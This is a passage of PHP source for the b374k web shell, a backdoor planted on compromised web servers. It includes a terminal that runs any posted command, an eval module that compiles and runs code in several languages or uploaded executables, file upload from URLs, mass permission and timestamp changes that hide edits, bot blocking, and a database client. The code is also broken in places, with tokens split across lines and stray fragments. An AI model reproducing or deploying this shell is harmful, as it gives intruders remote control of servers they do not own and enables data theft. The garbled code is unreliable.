</div></th><th class='col-name'>name</th><th class='col-size'>size</th>";

foreach($cols as $k=>$v){
    $output .= "<th class='col-".$k."'>".$k."</th>";
}
$output .= "</tr></thead><tbody>";

foreach($allfolders as $d){
    $cboxException = "";
    if(($d=="." || ($d==".."))){
        $action = "actiondot";
        $cboxException = " cBoxException";
    }
    else{
        $action = "actionfolder";
        $totalFolders++;
    }
    $output .= "
    <tr data-path=\"".html_safe(realpath($d).DIRECTORY_SEPARATOR)."\"><td><div class='c
Box".$cboxException."'></div></td>
    <td style='white-space:normal;'><a class='navigate'>[ ".html_safe($d)." ]</a><span
class='".$action.'" floatRight'>action</span></td>
    <td>DIR</td>";
        foreach($cols as $k=>$v){
            $sortable = "";
            if($k=='modified') $sortable = " title='".filemtime($d)."'";

            $output .= "<td".$sortable.">".$v($d)."</td>";
        }
        $output .= "</tr>";
    }
    foreach($allfiles as $f){
        $output .= "
    <tr data-path=\"".html_safe(realpath($f))."\"><td><div class='cBox'></div></td>
    <td style='white-space:normal;'><a class='view'>".html_safe($f)."</a><span class='a
ction floatRight'>action</span></td>
    <td title='".filesize($f)."'>".get_filesize($f)."</td>";
        foreach($cols as $k=>$v){
            $sortable = "";
            if($k=='modified') $sortable = " title='".filemtime($f)."'";

            $output .= "<td".$sortable.">".$v($f)."</td>";
        }
        $output .= "</tr>";
    }
}
$output .= "</tbody><tfoot>";

$colspan = 1 + count($cols);
$output .= "<tr><td><div class='cBoxAll'></div></td><td>
<select id='massAction' class='colSpan'>
<option disabled selected>Action</option>
<option>cut</option>
<option>copy</option>
<option>paste</option>
<option>delete</option>
<option disabled>-----</option>
<option>chmod</option>
<option>chown</option>
```

```
<option>touch</option>
<option disabled>-----</option>
<option>extract (tar)</option>
<option>extract (tar.gz)</option>
<option>extract (zip)</option>
<option disabled>-----</option>
<option>compress (tar)</option>
<option>compress (tar.gz)</option>
<option>compress (zip)</option>
<option disabled>-----</option>
</select>
</td><td colspan="'. $colspan.'"></td></tr>
<tr><td></td><td colspan="'. ++$colspan.'">". $totalFiles." file(s), ". $total
Folders." Folder(s)<span class='xplSelected'></span></td></tr>
";
$output .= "</tfoot></table>";
return $output;
}
}

if(!function_exists('eval_get_supported')){
function eval_get_supported(){
    $eval_supported = array();

    $eval_supported[] = "php";

    $check = strtolower(execute("python -h"));
    if(strpos($check, "usage")!==false) $eval_supported[] = "python";

    $check = strtolower(execute("perl -h"));
    if(strpos($check, "usage")!==false) $eval_supported[] = "perl";

    $check = strtolower(execute("ruby -h"));
    if(strpos($check, "usage")!==false) $eval_supported[] = "ruby";

    $check = strtolower(execute("node -h"));
    if(strpos($check, "usage")!==false) $eval_supported[] = "node";
    else{
        $check = strtolower(execute("nodejs -h"));
        if(strpos($check, "usage")!==false) $eval_supported[] = "nodejs";
    }

    $check = strtolower(execute("gcc --help"));
    if(strpos($check, "usage")!==false) $eval_supported[] = "gcc";

    $check = strtolower(execute("java -help"));
    if(strpos($check, "usage")!==false){
        $check = strtolower(execute("javac -help"));
        if(strpos($check, "usage")!==false) $eval_supported[] = "java";
    }

    return implode(",", $eval_supported);
}
}

if(!function_exists('eval_go')){
function eval_go($evalType, $evalCode, $evalOptions, $evalArguments){
    $res = "";
    $output = "";
    if($evalOptions!="") $evalOptions = $evalOptions." ";
    if($evalArguments!="") $evalArguments = " ".$evalArguments;

    if($evalType=="php"){
        ob_start();
        eval($evalCode);
        $res = ob_get_contents();
        ob_end_clean();
        return $res;
    }
}
```

```
    }
    elseif(($evalType=="python") || ($evalType=="perl") || ($evalType=="ruby") || ($evalType=="node") || ($evalType=="nodejs")){
        $tmpdir = get_writable_dir();
        chdir($tmpdir);

        $res .= "Using dir : ".$tmpdir;
        if(is_writable($tmpdir)){
            $res .= " (writable)\n";
            $uniq = substr(md5(time()),0,8);
            $filename = $evalType.$uniq;
            $path = $filename;
            $res .= "Temporary file : ".$path;
            if(write_file($path, $evalCode)){
                $res .= " (ok)\n";
                $res .= "Setting permissions : 0755";
                if(chmod($path, 0755)){
                    $res .= " (ok)\n";
                    $cmd = $evalType." ".$evalOptions.$path.$evalArguments;

                    $res .= "Execute : ".$cmd."\n";
                    $output = execute($cmd);
                }
                else $res .= " (failed)\n";

                $res .= "Deleting temporary file : ".$path;
                if(unlink($path)) $res .= " (ok)\n";
                else $res .= " (failed)\n";
            }
            else $res .= " (failed)\n";
        }
        else $res .= " (not writable)\n";

        $res .= "Finished...";
        return $res."{[|b374k|]}".$output;
    }
    elseif($evalType=="gcc"){
        $tmpdir = get_writable_dir();
        chdir($tmpdir);

        $res .= "Using dir : ".$tmpdir;
        if(is_writable($tmpdir)){
            $res .= " (writable)\n";
            $uniq = substr(md5(time()),0,8);
            $filename = $evalType.$uniq.".c";
            $path = $filename;
            $res .= "Temporary file : ".$path;
            if(write_file($path, $evalCode)){
                $res .= " (ok)\n";
                $ext = (is_win())? ".exe":".out";
                $pathres = $filename.$ext;
                $evalOptions = "-o ".$pathres." ".$evalOptions;
                $cmd = "gcc ".$evalOptions.$path;
                $res .= "Compiling : ".$cmd;
                $res .= execute($cmd);
                if(is_file($pathres)){
                    $res .= " (ok)\n";
                    $res .= "Setting permissions : 0755";
                    if(chmod($pathres, 0755)){
                        $res .= " (ok)\n";
                        $cmd = $pathres.$evalArguments;
                        $res .= "Execute : ".$cmd."\n";
                        $output = execute($cmd);
                    }
                    else $res .= " (failed)\n";
                    $res .= "Deleting temporary file : ".$pathres;

                    if(unlink($pathres)) $res .= " (ok)\n";
                }
            }
        }
    }
}
es;
```

```

        else $res .= " (failed)\n";
    }
    else $res .= " (failed)\n";
    $res .= "Deleting temporary file : ".$path;
    if(unlink($path)) $res .= " (ok)\n";
    else $res .= " (failed)\n";
}
else $res .= " (failed)\n";
}
else $res .= " (not writable)\n";

$res .= "Finished...";
return $res."{[|b374k|]}".$output;
}
elseif($evalType=="java"){
    $tmpdir = get_writable_dir();
    chdir($tmpdir);

    $res .= "Using dir : ".$tmpdir;
    if(is_writable($tmpdir)){
        $res .= " (writable)\n";

        if(preg_match("/class\ ([^{}+)]+/i",$evalCode, $r)){
            $classname = trim($r[1]);
            $filename = $classname;
        }
        else{
            $uniq = substr(md5(time()),0,8);
            $filename = $evalType.$uniq;
            $evalCode = "class ".$filename." { ".$evalCode . "
} ";

        }

        $path = $filename.".java";
        $res .= "Temporary file : ".$path;
        if(write_file($path, $evalCode)){
            $res .= " (ok)\n";
            $cmd = "javac ".$evalOptions.$path;
            $res .= "Compiling : ".$cmd;
            $res .= execute($cmd);
            $pathres = $filename.".class";
            if(is_file($pathres)){
                $res .= " (ok)\n";
                $res .= "Setting permissions : 0755";
                if(chmod($pathres, 0755)){
                    $res .= " (ok)\n";
                    $cmd = "java ".$filename.$evalArgument;

                    $res .= "Execute : ".$cmd."\n";
                    $output = execute($cmd);
                }
                else $res .= " (failed)\n";
                $res .= "Deleting temporary file : ".$pathres;

                if(unlink($pathres)) $res .= " (ok)\n";
                else $res .= " (failed)\n";
            }
            else $res .= " (failed)\n";
            $res .= "Deleting temporary file : ".$path;
            if(unlink($path)) $res .= " (ok)\n";
            else $res .= " (failed)\n";
        }
        else $res .= " (failed)\n";
    }
    else $res .= " (not writable)\n";

    $res .= "Finished...";
    return $res."{[|b374k|]}".$output;
}

```



```
}
elseif($evalType=="executable"){
    $tmpdir = get_writable_dir();
    chdir($tmpdir);

    $res .= "Using dir : ".$tmpdir;
    if(is_writable($tmpdir)){
        $res .= " (writable)\n";
        $uniq = substr(md5(time()),0,8);
        $filename = $evalType.$uniq.".exe";
        $path = $filename;
        $res .= "Temporary file : ".$path;
        if(write_file($path, $evalCode)){
            $res .= " (ok)\n";
            $cmd = $path.$evalArguments;
            $res .= "Execute : ".$cmd."\n";
            $output = execute($cmd);

            $res .= "Deleting temporary file : ".$path;
            if(unlink($path)) $res .= " (ok)\n";
            else $res .= " (failed)\n";
        }
        else $res .= " (failed)\n";
    }
    else $res .= " (not writable)\n";

    $res .= "Finished...";
    return $res."{[|b374k|]}".$output;
}
return false;
}
}

if(!function_exists('output')){
    function output($str){
        $error = @ob_get_contents();
        @ob_end_clean();
        header("Content-Type: text/plain");
        header("Cache-Control: no-cache");
        header("Pragma: no-cache");
        echo $str;
        die();
    }
}
block_bot();
auth();
chdir(get_cwd());
$nav = get_nav(get_cwd());
$p = array_map("rawurldecode", get_post());
$cwd = html_safe(get_cwd());
$GLOBALS['module'] = array();

$explorer_content = "";
if(isset($p['viewEntry'])){
    $path = trim($p['viewEntry']);
    if(is_file($path)){
        $dirname = realpath(dirname($path)).DIRECTORY_SEPARATOR;
        setcookie("cwd", $dirname);
        chdir($dirname);
        $nav = get_nav($dirname);
        $cwd = html_safe($dirname);
        $explorer_content = view_file($path, "auto");
    }
    elseif(is_dir($path)){
        $path = realpath($path).DIRECTORY_SEPARATOR;
        setcookie("cwd", $path);
        chdir($path);
        $nav = get_nav($path);
    }
}
```

```

    $cwd = html_safe($path);
    $explorer_content = show_all_files($path);
}
else $explorer_content = show_all_files(get_cwd());

$GLOBALS['module']['explorer']['id'] = "explorer";
$GLOBALS['module']['explorer']['title'] = "Explorer";
$GLOBALS['module']['explorer']['js_ontabselected'] = "";
$GLOBALS['module']['explorer']['content'] = $explorer_content;

$GLOBALS['module']['terminal']['id'] = "terminal";
$GLOBALS['module']['terminal']['title'] = "Terminal";
$GLOBALS['module']['terminal']['js_ontabselected'] = "
if(!portableMode) && ($('#terminalOutput').html()=='') ($('#terminalInput').focus());";
$GLOBALS['module']['terminal']['content'] = "<pre id='terminalOutput'></pre><table id='terminalPrompt'><tr><td class='colFit'><span id='terminalCwd' class='strong'>".get_cwd()."&gt;</span></td><td id='terminalCommand'><input type='text' id='terminalInput' class='floatLeft' spellcheck='false'></td></tr></table>";

$GLOBALS['module']['eval']['id'] = "eval";
$GLOBALS['module']['eval']['title'] = "Eval";
$GLOBALS['module']['eval']['js_ontabselected'] = "
if(!portableMode) && ($('#evalOutput').html()=='You can also press ctrl+enter to submit'))
$('#evalInput').focus();";
$GLOBALS['module']['eval']['content'] = "
<table class='boxtbl'>
<thead>
<tr><th colspan='4'><p class='boxtitle'>Eval</p></th></tr>
</thead>
<tbody>
<tr><td colspan='4'><textarea id='evalInput' spellcheck='false' style='height:140px;min-height:140px;'></td></tr>

<tr id='evalAdditional'><td colspan='4'>
<input type='text' id='evalOptions' value='Options/Switches' spellcheck='false' onkeydown=\"trap_enter(event, 'eval_go');\">
<input type='text' id='evalArguments' value='Arguments' spellcheck='false' onkeydown=\"trap_enter(event, 'eval_go');\">
</td></tr>

<tr>
<td style='width:144px;'>
<select id='evalType'>

</select>
</td>
<td colspan='3'>
<span id='evalSubmit' style='width:120px;' class='button' onclick=\"eval_go();\">run</span>
</td>
</tr>

<tr><td colspan='4'><pre id='evalOutput'>You can also press ctrl+enter to submit</pre></td></tr>
</tbody>
</table>
";

$res = "";
if(isset($p['cd'])){
    $path = $p['cd'];
    if(trim($path)=='') $path = dirname(__FILE__);

    $path = realpath($path);
    if(is_file($path)) $path = dirname($path);
    if(is_dir($path)){

```

```
    chdir($path);
    $path = $path.DIRECTORY_SEPARATOR;
    setcookie("cwd", $path);
    $res = $path."{[|b374k|]}.get_nav($path).{[|b374k|]}";
    if(isset($p['showfiles'])&&($p['showfiles']=='true')){
        $res .= show_all_files($path);
    }
}
else $res = "error";
output($res);
}
elseif(isset($p['viewFile']) && isset($p['viewType'])){
    $path = trim($p['viewFile']);
    $type = trim($p['viewType']);
    $preserveTimestamp = trim($p['preserveTimestamp']);
    if(is_file($path)){
        $res = view_file($path, $type, $preserveTimestamp);
    }
    else $res = "error";
    output($res);
}
elseif(isset($p['renameFile']) && isset($p['renameFileTo'])){
    $renameFile = trim($p['renameFile']);
    $renameFileTo = trim($p['renameFileTo']);
    if(file_exists($renameFile)){
        if(rename($renameFile, $renameFileTo)){
            $res = dirname($renameFileTo);
        }
        else $res = "error";
    }
    else $res = "error";
    output($res);
}
elseif(isset($p['newFolder'])){
    $newFolder = trim($p['newFolder']);
    if(mkdir($newFolder)){
        $res = dirname($newFolder);
    }
    else $res = "error";
    output($res);
}
elseif(isset($p['newFile'])){
    $newFile = trim($p['newFile']);
    if(touch($newFile)){
        $res = dirname($newFile);
    }
    else $res = "error";
    output($res);
}
elseif(isset($p['delete'])){
    $path = trim($p['delete']);
    $dirname = dirname($path);
    if(is_file($path)){
        if(unlink($path)) $res = $dirname;
    }
    elseif(is_dir($path)){
        if(rmdir($path)>0) $res = $dirname;
    }
    else $res = "error";
    if(file_exists($path)) $res = "error";
    output($res);
}
elseif(isset($p['editType'])&&isset($p['editFilename'])&&isset($p['editInput'])&&isset($p['preserveTimestamp'])){
    $editFilename = trim($p['editFilename']);
    $editInput = trim($p['editInput']);
    $editType = trim($p['editType']);
    $preserveTimestamp = trim($p['preserveTimestamp']);
}
```

```

$time = filemtime($editFilename);
if($editType=='hex') $editInput = pack("H*" , preg_replace("/\s/", "", $editInput));
if(write_file($editFilename, $editInput)){
    $res = $editFilename;
    if($preserveTimestamp=='true') touch($editFilename, $time);
}
else $res = "error";
output($res);
}
elseif(isset($p['findType'])){
    $findType = trim($p['findType']);
    $findPath = trim($p['findPath']);
    $findName = trim($p['findName']);
    $findNameRegex = trim($p['findNameRegex']);
    $findNameInsensitive = trim($p['findNameInsensitive']);
    $findContent = trim($p['findContent']);
    $findContentRegex = trim($p['findContentRegex']);
    $findContentInsensitive = trim($p['findContentInsensitive']);
    $findReadable = trim($p['findReadable']);
    $findWritable = trim($p['findWritable']);
    $findExecutable = trim($p['findExecutable']);

    $candidate = get_all_files($findPath);
    if($findType=='file') $candidate = array_filter($candidate, "is_file");
    elseif($findType=='folder') $candidate = array_filter($candidate, "is_dir");
    else $res = "error";

    foreach($candidate as $k){
        if(($findType=="file" || ($findType=="folder")){
            if(!empty($findName)){
                if($findNameRegex=="true"){
                    $case = ($findNameInsensitive=="true")? "i":"";
                    if(!preg_match("/".$findName.$case, basename($k))){
                        $candidate = array_diff($candidate, array($k));
                    }
                }
                else{
                    $check = false;
                    if($findNameInsensitive=="true"){
                        $check = strpos(strtolower(basename($k)), strtolower($findName))===false;
                    }
                    else{
                        $check = strpos(basename($k), $findName)===false;
                    }
                    if($check){
                        $candidate = array_diff($candidate, array($k));
                    }
                }
            }
        }
        if($findType=="file"){
            if(!empty($findContent)){
                $content = read_file($k);
                if($findContentRegex=="true"){
                    $case = ($findContentInsensitive=="true")? "i":"";
                    if(!preg_match("/".$findContent.$case, $content))){
                        $candidate = array_diff($candidate, array($k));
                    }
                }
            }
        }
    }
}

```

```

        $check = false;
        if($findContentInsensitive=="true"){
            $check = strpos(strtolower($content), strtolower($findContent))===false;
        }
        else{
            $check = strpos($content, $findContent)===false;
        }
        if($check){
            $candidate = array_diff($candidate, array($k));
        }
    }
}

foreach($candidate as $k){
    if($findReadable=="true"){
        if(!is_readable($k)) $candidate = array_diff($candidate, array($k));
    }
    if($findWritable=="true"){
        if(!is_writable($k)) $candidate = array_diff($candidate, array($k));
    }
    if($findExecutable=="true"){
        if(!is_executable($k)) $candidate = array_diff($candidate, array($k));
    }
}

if(count($candidate)>0){
    $res = "";
    foreach($candidate as $k){
        $res .= "<p><span class='strong'>&gt;</span>&nbsp;<a data-path='".html_safe($k)."' onclick='view_entry(this);'>".html_safe($k)."</a></p>";
    }
    else $res = "";
    output($res);
}
elseif(isset($p['ulType'])){
    $ulSaveTo = trim($p['ulSaveTo']);
    $ulFilename = trim($p['ulFilename']);

    if($p['ulType']=='comp'){
        $ulFile = $_FILES['ulFile'];
        if(empty($ulFilename)) $ulFilename = $ulFile['name'];

        if(is_uploaded_file($ulFile['tmp_name'])){
            if(!is_dir($ulSaveTo)) mkdir($ulSaveTo);
            $newfile = realpath($ulSaveTo).DIRECTORY_SEPARATOR.$ulFilename;
            if(move_uploaded_file($ulFile['tmp_name'], $newfile)){
                $res = "<span class='strong'>&gt;</span>&nbsp;<a data-path='".html_safe($newfile)."' onclick='view_entry(this);'>".html_safe($newfile)."</a>&nbsp;<span style='float:right'>( 100% )";
            }
            else $res = "error";
        }
        else $res = "error";
    }
}
elseif($p['ulType']=='url'){
    $ulFile = trim($p['ulFile']);
    if(empty($ulFilename)) $ulFilename = basename($ulFile);
    if(!is_dir($ulSaveTo)) mkdir($ulSaveTo);
    $newfile = realpath($ulSaveTo).DIRECTORY_SEPARATOR.$ulFilename;

```

```
        if(download($ulFile, $newfile)){
            $res = "<span class='strong'>&gt;</span>&nbsp;<a data-path='".html_
safe($newfile)."' onclick='view_entry(this);'>".html_safe($newfile)."</a>&nbsp;< ( 100% )";
        }
        else $res = "error";
    }
    else $res = "error";
    output($res);
}
elseif(isset($p['download'])){
    $file = trim($p['download']);
    if(is_file($file)){
        header("Content-Type: application/octet-stream");
        header('Content-Transfer-Encoding: binary');
        header("Content-length: ".filesize($file));
        header("Cache-Control: no-cache");
        header("Pragma: no-cache");
        header("Content-disposition: attachment; filename=\"".basename($file)."\");"
    );
        $handler = fopen($file,"rb");
        while(!feof($handler)){
            print(fread($handler, 1024*8));
            @ob_flush();
            @flush();
        }
        fclose($handler);
        die();
    }
}
elseif(isset($p['multimedia'])){
    $file = trim($p['multimedia']);
    $mime_list = get_resource('mime');
    $mime = "";
    $file_ext_pos = strrpos($file, ".");
    if($file_ext_pos!==false){
        $file_ext = trim(substr($file, $file_ext_pos, ".");
        if(preg_match("/([^\s]+)\ .*\.b".$file_ext."\b.*\/i", $mime_list, $res)){
            $mime = $res[1];
        }
    }
}
if(is_file($file)){
    header("Content-Type: ".$mime);
    header('Content-Transfer-Encoding: binary');
    header("Content-length: ".filesize($file));
    echo "data: ".$mime.";base64, ".base64_encode(read_file($file));
    die();
}
}
elseif(isset($p['massType'])&&isset($p['massBuffer'])&&isset($p['massPath'])&&isset($p['mas
sValue'])){
    $massType = trim($p['massType']);
    $massBuffer = trim($p['massBuffer']);
    $massPath = realpath($p['massPath']).DIRECTORY_SEPARATOR;
    $massValue = trim($p['massValue']);
    $counter = 0;

    $massBufferArr = explode("\n", $massBuffer);
    if(($massType=='tar')||($massType=='targz')||($massType=='zip')){
        if(compress($massType, $massValue, $massBufferArr)){
            $counter++;
            return $counter;
        }
    }
}
else{
    foreach($massBufferArr as $k){
        $path = trim($k);
```

```
        if(file_exists($path)){
            $preserveTimestamp = filemtime($path);
            if($massType=='delete'){
                if(is_file($path)){
                    if(unlink($path)) $counter++;
                }
                elseif(is_dir($path)){
                    if(rmdir($path)>0) $counter++;
                }
            }
            elseif($massType=='cut'){
                $dest = $massPath.basename($path);
                if(rename($path, $dest)){
                    $counter++;
                    touch($dest, $preserveTimestamp);
                }
            }
            elseif($massType=='copy'){
                $dest = $massPath.basename($path);
                if(is_dir($path)){
                    if(copys($path, $dest)>0) $counter++;
                }
                elseif(is_file($path)){
                    if(copy($path, $dest)) $counter++;
                }
            }
            elseif(($massType=='untar' || ($massType=='untargz' || ($mass
Type=='unzip'))){
                if(decompress($massType, $path, $massValue)){
                    $counter++;
                    return $counter;
                }
            }
            elseif(!empty($massValue)){
                if($massType=='chmod'){
                    if(chmod($path, octdec($massValue))) $count
er++;
                }
                elseif($massType=='chown'){
                    if(chown($path, $massValue)) $counter++;
                }
                elseif($massType=='touch'){
                    if(touch($path, strtotime($massValue))) $co
unter++;
                }
            }
        }
    }
}
if($counter>0) output($counter);
output('error');
}
elseif(isset($p['viewFileorFolder'])){
    $entry = $p['viewFileorFolder'];
    if(is_file($entry)) output('file');
    elseif(is_dir($entry)) output('folder');
    output('error');
}
elseif(isset($p['terminalInput'])){
    output(html_safe(execute($p['terminalInput'])));
}
elseif(isset($p['evalInput']) && isset($p['evalType'])){
    $evalInput = $p['evalInput'];
    $evalOptions = (isset($p['evalOptions']))? $p['evalOptions']:"";
    $evalArguments = (isset($p['evalArguments']))? $p['evalArguments']:"";
    $evalType = $p['evalType'];

    error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
```

```
@ini_set('html_errors','0');
@ini_set('display_errors','1');
@ini_set('display_startup_errors','1');

$res = eval_go($evalType, $evalInput, $evalOptions, $evalArguments);
if($res===false) $res == "error";
output(html_safe($res));
}
elseif(isset($p['evalGetSupported'])){
    $res = eval_get_supported();
    output($res);
}
$GLOBALS['module']['convert']['id'] = "convert";
$GLOBALS['module']['convert']['title'] = "Convert";
$GLOBALS['module']['convert']['js_ontabselected'] = "
if(!portableMode) && ($('#decodeResult').children().length==1) $('#decodeStr').focus();";
$GLOBALS['module']['convert']['content'] = "
<table class='boxtbl'>
<thead>
    <tr><th colspan='2'><p class='boxtitle'>Convert</p></th></tr>
</thead>
<tbody>
    <tr><td colspan='2'><textarea style='height:140px;min-height:140px;' id='decodeStr'
></textarea></td></tr>
    <tr><td colspan='2'><span class='button' onclick='decode_go();'>convert</span></td>
</tr>
</tbody>
<tfoot id='decodeResult'><tr><td colspan='2'>You can also press ctrl+enter to submit</td></tr>
</tfoot>
</table>";

if(!function_exists('decode')){
    function decode($str){
        $res = "";
        $length = (int) strlen($str);

        $res .= decode_line("md5", md5($str), "input");
        $res .= decode_line("sha1", sha1($str), "input");

        $res .= decode_line("base64 encode", base64_encode($str), "textarea");
        $res .= decode_line("base64 decode", base64_decode($str), "textarea");

        $res .= decode_line("hex to string", @pack("H*", $str), "textarea");
        $res .= decode_line("string to hex", bin2hex($str), "textarea");

        $ascii = "";
        for($i=0; $i<$length; $i++){
            $ascii .= ord(substr($str,$i,1))." ";
        }
        $res .= decode_line("ascii char", trim($ascii), "textarea");

        $res .= decode_line("reversed", strrev($str), "textarea");
        $res .= decode_line("lowercase", strtolower($str), "textarea");
        $res .= decode_line("uppercase", strtoupper($str), "textarea");

        $res .= decode_line("urlencode", urlencode($str), "textarea");
        $res .= decode_line("urldecode", urldecode($str), "textarea");
        $res .= decode_line("rawurlencode", rawurlencode($str), "textarea");
        $res .= decode_line("rawurldecode", rawurldecode($str), "textarea");

        $res .= decode_line("htmlentities", html_safe($str), "textarea");

        if(function_exists('hash_algos')){
            $algos = hash_algos();
            foreach($algos as $algo){
                if(($algo=='md5')||($algo=='sha1')) continue;
                $res .= decode_line($algo, hash($algo, $str), "input");
            }
        }
    }
}
```



```

    }
    return $res;
}
}

if(!function_exists('decode_line')){
    function decode_line($type, $result, $inputtype){
        $res = "<tr><td class='colFit'>".$type."</td><td>";
        if($inputtype=='input'){
            $res .= "<input type='text' value='".html_safe($result)." ondblcli
ck='this.select();'>";
        }
        else{
            $res .= "<textarea style='height:80px;min-height:80px;' ondblclick=
'this.select();'>".html_safe($result)."</textarea>";
        }
        return $res;
    }
}

if(isset($p['decodeStr'])){
    $decodeStr = $p['decodeStr'];
    output(decode($decodeStr));
}
$GLOBALS['module']['database']['id'] = "database";
$GLOBALS['module']['database']['title'] = "Database";
$GLOBALS['module']['database']['js_ontabselected'] = "";
$GLOBALS['module']['database']['content'] = "
<table class='boxtbl'>
<thead>
    <tr><th colspan='3'><p class='boxtitle'>Connect</p></th></tr>
</thead>
<tbody>
    <tr class='dbHostRow'><td style='width:144px' class='dbHostLbl'>Host</td><td colspa
n='2'><input type='text' id='dbHost' value='' onkeydown=\"trap_enter(event, 'db_connect');\
"></td></tr>
    <tr class='dbUserRow'><td>Username</td><td colspan='2'><input type='text' id='dbUse
r' value='' onkeydown=\"trap_enter(event, 'db_connect');\"></td></tr>
    <tr class='dbPassRow'><td>Password</td><td colspan='2'><input type='text' id='dbPas
s' value='' onkeydown=\"trap_enter(event, 'db_connect');\"></td></tr>
    <tr class='dbPortRow'><td>Port (Optional)</td><td colspan='2'><input type='text' id
='dbPort' value='' onkeydown=\"trap_enter(event, 'db_connect');\"></td></tr>
</tbody>
<tfoot>
    <tr class='dbConnectRow'>
        <td style='width:144px;'>
            <select id='dbType'>
                </select>
        </td>
        <td style='width:120px;'><span class='button' onclick=\"db_connect();\">con
nect</span></td>
        <td class='dbError'></td>
    </tr>
    <tr class='dbQueryRow' style='display:none;'>
        <td colspan='3'><textarea id='dbQuery' style='min-height:140px;height:140px
;'>You can also press ctrl+enter to submit</textarea></td>
    </tr>
    <tr class='dbQueryRow' style='display:none;'>
        <td style='width:120px;'><span class='button' onclick=\"db_run();\">run</sp
an></td>
        <td style='width:120px;'><span class='button' onclick=\"db_disconnect();\">
disconnect</span></td>
        <td>Separate multiple commands with a semicolon <span class='strong'></spa
n> ; <span class='strong'></span></td>
    </tr>
</tfoot>

```

```
</table>
<div id='dbBottom' style='display:none;'>
<br>
<table class='border' style='padding:0;'><tr><td id='dbNav' class='colFit borderright' styl
e='vertical-align:top;'></td><td id='dbResult' style='vertical-align:top;'></td></tr></tabl
e>
</div>
";

if(!function_exists('sql_connect')){
    function sql_connect($sqltype, $sqlhost, $sqluser, $sqlpass){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli')) return new mysqli($sqlhost, $sqluser, $s
sqlpass);
            elseif(function_exists('mysql_connect')) return @mysql_connect($sql
host, $sqluser, $sqlpass);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_connect')){
                $coninfo = array("UID"=>$sqluser, "PWD"=>$sqlpass);
                return @sqlsrv_connect($sqlhost,$coninfo);
            }
            elseif(function_exists('mssql_connect')) return @mssql_connect($sql
host, $sqluser, $sqlpass);
        }
        elseif($sqltype == 'pgsql'){
            $hosts = explode(":", $sqlhost);
            if(count($hosts)==2){
                $host_str = "host=".$hosts[0]. " port=".$hosts[1];
            }
            else $host_str = "host=".$sqlhost;
            if(function_exists('pg_connect')) return @pg_connect("$host_str use
r=$sqluser password=$sqlpass");
        }
        elseif($sqltype == 'oracle'){ if(function_exists('oci_connect')) return @oc
i_connect($sqluser, $sqlpass, $sqlhost); }
        elseif($sqltype == 'sqlite3'){
            if(class_exists('SQLite3')) if(!empty($sqlhost)) return new SQLite3
($sqlhost);
            else return false;
        }
        elseif($sqltype == 'sqlite'){ if(function_exists('sqlite_open')) return @sq
lite_open($sqlhost); }
        elseif($sqltype == 'odbc'){ if(function_exists('odbc_connect')) return @odb
c_connect($sqlhost, $sqluser, $sqlpass); }
        elseif($sqltype == 'pdo'){
            if(class_exists('PDO')) if(!empty($sqlhost)) return new PDO($sqlhos
t, $sqluser, $sqlpass);
            else return false;
        }
        return false;
    }
}

if(!function_exists('sql_query')){
    function sql_query($sqltype, $query, $con){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli')) return $con->query($query);
            elseif(function_exists('mysql_query')) return mysql_query($query);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_query')) return sqlsrv_query($con,$query
);
            elseif(function_exists('mssql_query')) return mssql_query($query);
        }
        elseif($sqltype == 'pgsql') return pg_query($query);
        elseif($sqltype == 'oracle') return oci_execute(oci_parse($con, $query));
        elseif($sqltype == 'sqlite3') return $con->query($query);
    }
}
```

```
elseif($sqltype == 'sqlite') return sqlite_query($con, $query);
elseif($sqltype == 'odbc') return odbc_exec($con, $query);
elseif($sqltype == 'pdo') return $con->query($query);
}
}

if(!function_exists('sql_num_rows')){
    function sql_num_rows($sqltype,$result){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli_result')) return $result->mysqli_num_rows;
            elseif(function_exists('mysql_num_rows')) return mysql_num_rows($re
sult);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($resu
lt);
            elseif(function_exists('mssql_num_rows')) return mssql_num_rows($re
sult);
        }
        elseif($sqltype == 'pgsql') return pg_num_rows($result);
        elseif($sqltype == 'oracle') return oci_num_rows($result);
        elseif($sqltype == 'sqlite3'){
            $metadata = $result->fetchArray();
            if(is_array($metadata)) return $metadata['count'];
        }
        elseif($sqltype == 'sqlite') return sqlite_num_rows($result);
        elseif($sqltype == 'odbc') return odbc_num_rows($result);
        elseif($sqltype == 'pdo') return $result->rowCount();
    }
}

if(!function_exists('sql_num_fields')){
    function sql_num_fields($sqltype, $result){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli_result')) return $result->field_count;
            elseif(function_exists('mysql_num_fields')) return mysql_num_fields
($result);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($
result);
            elseif(function_exists('mssql_num_fields')) return mssql_num_fields
($result);
        }
        elseif($sqltype == 'pgsql') return pg_num_fields($result);
        elseif($sqltype == 'oracle') return oci_num_fields($result);
        elseif($sqltype == 'sqlite3') return $result->numColumns();
        elseif($sqltype == 'sqlite') return sqlite_num_fields($result);
        elseif($sqltype == 'odbc') return odbc_num_fields($result);
        elseif($sqltype == 'pdo') return $result->columnCount();
    }
}

if(!function_exists('sql_field_name')){
    function sql_field_name($sqltype,$result,$i){
        if($sqltype == 'mysql'){
            if(class_exists('mysqli_result')) { $z=$result->fetch_field();retur
n $z->name;}
            elseif(function_exists('mysql_field_name')) return mysql_field_name
($result,$i);
        }
        elseif($sqltype == 'mssql'){
            if(function_exists('sqlsrv_field_metadata')){
                $metadata = sqlsrv_field_metadata($result);
                if(is_array($metadata)){
                    $metadata=$metadata[$i];
                }
                if(is_array($metadata)) return $metadata['Name'];
            }
        }
    }
}
```

```
        }
        elseif(function_exists('mssql_field_name')) return mssql_field_name
($result,$i);
    }
    elseif($sqltype == 'pgsql') return pg_field_name($result,$i);
    elseif($sqltype == 'oracle') return oci_field_name($result,$i+1);
    elseif($sqltype == 'sqlite3') return $result->columnName($i);
    elseif($sqltype == 'sqlite') return sqlite_field_name($result,$i);
    elseif($sqltype == 'odbc') return odbc_field_name($result,$i+1);
    elseif($sqltype == 'pdo'){
        $res = $result->getColumnMeta($i);
        return $res['name'];
    }
}
}

if(!function_exists('sql_fetch_data')){
    function sql_fetch_data($sqltype,$result){
